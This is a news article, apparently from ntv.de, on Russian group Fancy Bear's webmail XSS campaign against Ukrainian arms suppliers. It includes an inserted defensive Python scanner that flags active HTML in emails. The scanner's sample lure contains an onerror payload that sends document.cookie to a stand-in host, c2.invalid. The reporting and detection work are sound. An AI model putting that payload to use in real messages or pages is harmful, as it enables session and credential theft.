Russian hackers very active: Fancy Bear attacks Ukrainian arms suppliers



Fancy Bear is notorious. The collective hacked the German Bundestag's IT infrastructure back in 2015.

(Photo: picture alliance / Klaus Ohlenschläger)

Manufacturers of Soviet-era weapons outside Russia are a backbone of Ukraine's defense. But these companies in Bulgaria, Romania, and Ukraine itself are apparently easy prey for Fancy Bear, a notorious hacking group attributed to Russian intelligence.

The notorious Russian hacker group Fancy Bear has targeted arms companies that supply weapons to Ukraine. This is according to a recent report by the Slovak security company ESET. According to the report, the attacks primarily targeted manufacturers of Soviet-era weapons in Bulgaria, Romania, and Ukraine, which play a key role in the defense against the Russian invasion. However, organizations in Africa and South America were also affected.

The hacker group Fancy Bear is also known as Sednit or APT28. It is also held responsible for the attacks on the German Bundestag in 2015, on the 2016 campaign of US presidential candidate Hillary Clinton, and on the SPD party headquarters in 2023. Experts believe the group is part of a larger strategy by Russian intelligence services to use cyberattacks as a means of political influence and destabilization. In addition to espionage, the focus is also on targeted disinformation campaigns directed against Western democracies.

In the current espionage campaign, dubbed "Operation RoundPress", the hackers exploited cross-site scripting (XSS) vulnerabilities in popular webmail software, including Roundcube, Zimbra, Horde, and MDaemon. Most of these flaws had already been patched by the vendors and could have been closed through routine software maintenance. In one case, however, the affected companies were virtually powerless: the attackers exploited a previously unknown (zero-day) vulnerability in MDaemon's webmail component, for which no patch existed at the time of the attacks.

According to ESET researchers, the attacks typically began with crafted emails disguised as news reports, with the senders made to look like reputable sources such as the Kyiv Post or the Bulgarian news portal News.bg. The malicious code was hidden in the HTML body of the message and ran as soon as the recipient merely displayed the email in the vulnerable webmail client in the browser; no attachment had to be opened and no link clicked. The messages also passed the targets' spam filters.
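A mail-store triage check of the kind an incident responder would run after reading the above, written as an added example (it is neither ESET's tooling nor code from the article): it parses raw .eml messages and flags HTML parts that carry script tags, inline event handlers, or javascript:/data: URIs, which is the active content a webmail XSS exploit embedded in a mail body relies on. The sample message, the sender domain and the C2 URL in it are constructed for the example.

```python
"""Triage scan of raw e-mail files for active HTML content of the kind used in
webmail XSS lures: a script tag, an inline event handler, or a javascript:/data:
URI inside an HTML body part. Standard library only."""
import email
import re
from email import policy
from html.parser import HTMLParser

# Constructed sample (not a real message from the campaign): a "news article"
# lure whose HTML part carries an onerror handler. Domains and URLs are made up.
SAMPLE_EML = b"""From: News Desk <news@example-news.invalid>
To: press@example-defense.invalid
Subject: Fwd: Breaking: Weapons deliveries to Ukraine
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Read the full story on our site.

--b1
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Read the full story on <a href="https://example-news.invalid/story">our site</a>.</p>
<img src="x" onerror="fetch('https://c2.invalid/?c='+encodeURIComponent(document.cookie))">
</body></html>

--b1--
"""

# Tags and attributes that can execute script or alter page behaviour when rendered.
SUSPECT_TAGS = {"script", "iframe", "object", "embed", "svg", "form", "meta", "base"}
URI_ATTRS = {"href", "src", "action", "formaction", "xlink:href", "data"}
SUSPECT_URI = re.compile(r"^\s*(javascript|vbscript|data)\s*:", re.IGNORECASE)


class ActiveContentFinder(HTMLParser):
    """Records tags and attributes that can run script when the HTML is rendered."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (kind, where, snippet)

    def handle_starttag(self, tag, attrs):
        if tag in SUSPECT_TAGS:
            self.findings.append(("tag", tag, ""))
        for name, value in attrs:
            value = value or ""
            # HTMLParser lower-cases attribute names, so onError / ONERROR are caught too.
            if name.startswith("on"):
                self.findings.append(("event-handler", f"{tag}@{name}", value[:80]))
            elif name in URI_ATTRS and SUSPECT_URI.match(value):
                self.findings.append(("uri-scheme", f"{tag}@{name}", value[:80]))
            elif name == "style" and "expression(" in value.lower():
                self.findings.append(("css-expression", f"{tag}@style", value[:80]))


def html_parts(raw):
    """Yield the decoded text/html bodies of a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_content()


def scan_eml(raw):
    """Return a list of (kind, where, snippet) findings across all HTML parts."""
    findings = []
    for body in html_parts(raw):
        finder = ActiveContentFinder()
        finder.feed(body)
        finder.close()
        findings.extend(finder.findings)
    return findings


if __name__ == "__main__":
    for kind, where, snippet in scan_eml(SAMPLE_EML):
        print(f"{kind:14} {where:20} {snippet}")
```

Run it over an exported mailbox directory and review every hit by hand: a finding means the message contains content that a browser could execute, not that the webmail client in use is vulnerable to it. The check is a triage heuristic, not a sanitizer; exploit authors obfuscate attribute names and URI schemes, and Python's HTML parser may tokenize malformed markup differently from a browser, so a clean result does not prove a message is harmless.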

During their analysis of the attacks, the ESET researchers identified the malware "SpyPress.MDAEMON". The program not only reads login credentials and the contents of mailboxes, but can also defeat two-factor authentication. Two-factor authentication (2FA for short) is an additional security measure when logging into online accounts or accessing sensitive data: a password alone is not enough to gain access, a second verification is required. In several cases, however, the Fancy Bear hackers bypassed the 2FA protection and obtained persistent access to mailboxes by creating so-called application passwords. An application password is a separate credential intended for mail clients that does not require the second factor, which is why incident response has to revoke such passwords as well rather than only resetting the main password.

"Many companies operate outdated webmail servers," said ESET researcher Matthieu Faou. "Even simply displaying an email in a browser can be enough to execute malicious code without the recipient actively clicking anything."

Source: ntv.de, jog/dpa
